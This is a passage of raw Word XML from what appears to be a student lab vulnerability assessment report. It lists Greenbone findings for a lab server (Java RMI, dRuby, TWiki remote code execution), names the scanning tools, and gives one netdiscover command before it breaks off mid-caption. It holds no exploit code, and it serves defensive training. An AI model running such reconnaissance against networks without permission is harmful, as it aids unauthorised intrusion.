      <w:tr w:rsidR="00953721" w14:paraId="7469FDAD" w14:textId="77777777" w:rsidTr="00B830BC">
        <w:trPr>
          <w:trHeight w:val="453"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1185" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="1032FB1C" w14:textId="1E02E5DF" w:rsidR="00953721" w:rsidRDefault="00953721" w:rsidP="00953721">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="0ED82E20" w14:textId="70395135" w:rsidR="00953721" w:rsidRPr="007D2985" w:rsidRDefault="00953721" w:rsidP="00953721">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="007D2985">
              <w:t>Java RMI Server Insecure Default Configuration Remote Code Execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="850" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E06666"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="166E4A02" w14:textId="3B59C908" w:rsidR="00953721" w:rsidRDefault="006C2B5F" w:rsidP="00953721">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>10.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E06666"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="2019F40A" w14:textId="6A19C294" w:rsidR="00953721" w:rsidRDefault="00953721" w:rsidP="00953721">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3808" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E06666"/>
          </w:tcPr>
          <w:p w14:paraId="1EB3D7C9" w14:textId="376A7215" w:rsidR="00953721" w:rsidRDefault="00B830BC" w:rsidP="00953721">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>Java RMI service runs with insecure defaults, allowing attackers to achieve remote code execution.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00953721" w14:paraId="6F8AD92F" w14:textId="77777777" w:rsidTr="00B830BC">
        <w:trPr>
          <w:trHeight w:val="453"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1185" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="18E139C0" w14:textId="794A8593" w:rsidR="00953721" w:rsidRDefault="00953721" w:rsidP="00953721">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="13714708" w14:textId="3AF34220" w:rsidR="00953721" w:rsidRPr="007D2985" w:rsidRDefault="00953721" w:rsidP="00953721">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="007D2985">
              <w:t>Distributed Ruby (</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="007D2985">
              <w:t>dRuby</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="007D2985">
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="007D2985">
              <w:t>DRb</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="007D2985">
              <w:t>) Multiple Remote Code Execution Vulnerabilities</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="850" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E06666"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="7BBEADEF" w14:textId="1C631E30" w:rsidR="00953721" w:rsidRDefault="006C2B5F" w:rsidP="00953721">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>10.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E06666"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="5D239439" w14:textId="2F73563F" w:rsidR="00953721" w:rsidRDefault="00953721" w:rsidP="00953721">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3808" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E06666"/>
          </w:tcPr>
          <w:p w14:paraId="38FA25D9" w14:textId="01EF795E" w:rsidR="00953721" w:rsidRDefault="00B830BC" w:rsidP="00953721">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>Insecure configuration of Distributed Ruby services could permit arbitrary code execution remotely.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00953721" w14:paraId="6258BEFA" w14:textId="77777777" w:rsidTr="00B830BC">
        <w:trPr>
          <w:trHeight w:val="453"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1185" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="63653B07" w14:textId="76C07BAF" w:rsidR="00953721" w:rsidRDefault="00953721" w:rsidP="00953721">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="3D9656A8" w14:textId="5155EFBE" w:rsidR="00953721" w:rsidRPr="007D2985" w:rsidRDefault="00953721" w:rsidP="00953721">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00DC36BB">
              <w:t>TWiki</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00DC36BB">
              <w:t xml:space="preserve"> XSS and Command Execution Vulnerabilities</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="850" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E06666"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="4B874013" w14:textId="2BB96C00" w:rsidR="00953721" w:rsidRDefault="006C2B5F" w:rsidP="00953721">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>10.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E06666"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="1EB1F8F6" w14:textId="3E30B3F4" w:rsidR="00953721" w:rsidRDefault="00953721" w:rsidP="00953721">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3808" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E06666"/>
          </w:tcPr>
          <w:p w14:paraId="01D95E02" w14:textId="77777777" w:rsidR="00B830BC" w:rsidRDefault="00B830BC" w:rsidP="00B830BC">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>TWiki</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> service contains XSS and command execution flaws, enabling attackers to inject and execute code.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2CA8C9F6" w14:textId="77777777" w:rsidR="00953721" w:rsidRDefault="00953721" w:rsidP="00953721">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="55A9B2D3" w14:textId="77777777" w:rsidR="00AE3438" w:rsidRDefault="00AE3438" w:rsidP="00A20EF6"/>
    <w:p w14:paraId="2515DF94" w14:textId="35A3B219" w:rsidR="00AE3438" w:rsidRPr="008C050B" w:rsidRDefault="002D7B8D" w:rsidP="00AE3438">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C050B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251660288" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="63F443D1" wp14:editId="4F53519A">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>842838</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1438385</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1598212" cy="707667"/>
                <wp:effectExtent l="57150" t="19050" r="78740" b="92710"/>
                <wp:wrapNone/>
                <wp:docPr id="1306617346" name="Rectangle 11"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1598212" cy="707667"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:noFill/>
                        <a:ln w="127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513F1" id="Rectangle 11" o:spid="_x0000_s1026" style="position:absolute;margin-left:66.35pt;margin-top:113.25pt;width:125.85pt;height:55.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" filled="f" strokecolor="#e00" strokeweight="1pt">
                <v:shadow on="t" color="black" opacity="22937f" origin=",.5" offset="0,.63889mm"/>
              </v:rect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00AE3438" w:rsidRPr="008C050B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="21837C04" wp14:editId="532F03A3">
            <wp:extent cx="4349363" cy="3080798"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
            <wp:docPr id="171534695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6957" name="Picture 9"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67275" cy="3093486"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="22990362" w14:textId="6952B5D0" w:rsidR="00444C92" w:rsidRPr="00CC0B3C" w:rsidRDefault="00A20EF6" w:rsidP="00AE3438">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C050B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="00331255" w:rsidRPr="008C050B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="008C050B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC0B3C">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Greenbone</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC0B3C">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> scan results for Application Server (192.168.57.30) showing multiple critical vulnerabilities</w:t>
      </w:r>
      <w:r w:rsidR="00A12088" w:rsidRPr="00CC0B3C">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78C1D2D3" w14:textId="77777777" w:rsidR="00730678" w:rsidRPr="00036C24" w:rsidRDefault="00730678" w:rsidP="00730678">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00036C24">
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Network/Host Vulnerability Assessment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A402043" w14:textId="77777777" w:rsidR="00036C24" w:rsidRDefault="00036C24" w:rsidP="00730678">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3EC1DF1D" w14:textId="0D9362C0" w:rsidR="00730678" w:rsidRPr="00036C24" w:rsidRDefault="00730678" w:rsidP="00730678">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00036C24">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Scope and tools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="401BCC23" w14:textId="2E993C1E" w:rsidR="00E617E5" w:rsidRDefault="00730678" w:rsidP="00AB418B">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Targets in the lab: Victim-Laptop (Windows) and Application Server 192.168.57.30 (DVWA/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Mutillidae</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">) on the 192.168.57.0/24 network. Discovery, enumeration and vulnerability scanning were performed with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Netdiscover</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, Nmap, and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Greenbone</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/OpenVAS. A credentialed Windows scan was configured for deeper host checks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14D8731A" w14:textId="77777777" w:rsidR="00036C24" w:rsidRDefault="00036C24" w:rsidP="00AB418B">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45C93B5C" w14:textId="77777777" w:rsidR="002F3798" w:rsidRDefault="002F3798" w:rsidP="002F3798">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0094128D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step-by-step methodology</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61E52CC5" w14:textId="77777777" w:rsidR="00036C24" w:rsidRPr="0094128D" w:rsidRDefault="00036C24" w:rsidP="002F3798">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53F70B97" w14:textId="77777777" w:rsidR="002F3798" w:rsidRPr="0094128D" w:rsidRDefault="002F3798" w:rsidP="002F3798">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0094128D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1) Network discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D9DEDD4" w14:textId="34C6FD9D" w:rsidR="00361F35" w:rsidRDefault="002F3798" w:rsidP="00063B3B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0094128D">
        <w:t xml:space="preserve">Ran </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0094128D">
        <w:t>netdiscover</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0094128D">
        <w:t xml:space="preserve"> on the assessment subnet to identify live hosts and MAC vendors.</w:t>
      </w:r>
      <w:r w:rsidRPr="0094128D">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="009F605D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
      <w:r w:rsidRPr="0094128D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0094128D">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0094128D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0094128D">
        <w:t>netdiscover</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0094128D">
        <w:t xml:space="preserve"> -r 192.168.57.0/24</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42A7E2A7" w14:textId="6DBE9CAA" w:rsidR="006A5496" w:rsidRPr="006A5496" w:rsidRDefault="00552855" w:rsidP="006A5496">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-DE" w:eastAsia="en-DE"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251661312" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="448D0FEE" wp14:editId="3026D340">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>59055</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1530046</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2289975" cy="842838"/>
                <wp:effectExtent l="57150" t="19050" r="72390" b="90805"/>
                <wp:wrapNone/>
                <wp:docPr id="836913066" name="Rectangle 17"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="2289975" cy="842838"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:noFill/>
                        <a:ln w="127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8037DB" id="Rectangle 17" o:spid="_x0000_s1026" style="position:absolute;margin-left:4.65pt;margin-top:120.5pt;width:180.3pt;height:66.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" filled="f" strokecolor="#e00" strokeweight="1pt">
                <v:shadow on="t" color="black" opacity="22937f" origin=",.5" offset="0,.63889mm"/>
              </v:rect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="006A5496" w:rsidRPr="006A5496">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-DE" w:eastAsia="en-DE"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006A5496" w:rsidRPr="006A5496">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4549FE26" wp14:editId="0D4C4B7A">
            <wp:extent cx="5168348" cy="4089400"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="380180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0168"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3387" cy="4093387"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4079BBA9" w14:textId="71A70362" w:rsidR="00361F35" w:rsidRPr="00122216" w:rsidRDefault="006A5496" w:rsidP="00361F35">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B64869">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>F</w:t>
      </w:r>
      <w:r w:rsidR="00361F35" w:rsidRPr="00B64869">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>igure</w:t>
      </w:r>
      <w:r w:rsidR="00122216" w:rsidRPr="00B64869">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 4</w:t>
      </w:r>
      <w:r w:rsidR="00361F35" w:rsidRPr="00B64869">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00361F35" w:rsidRPr="00122216">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
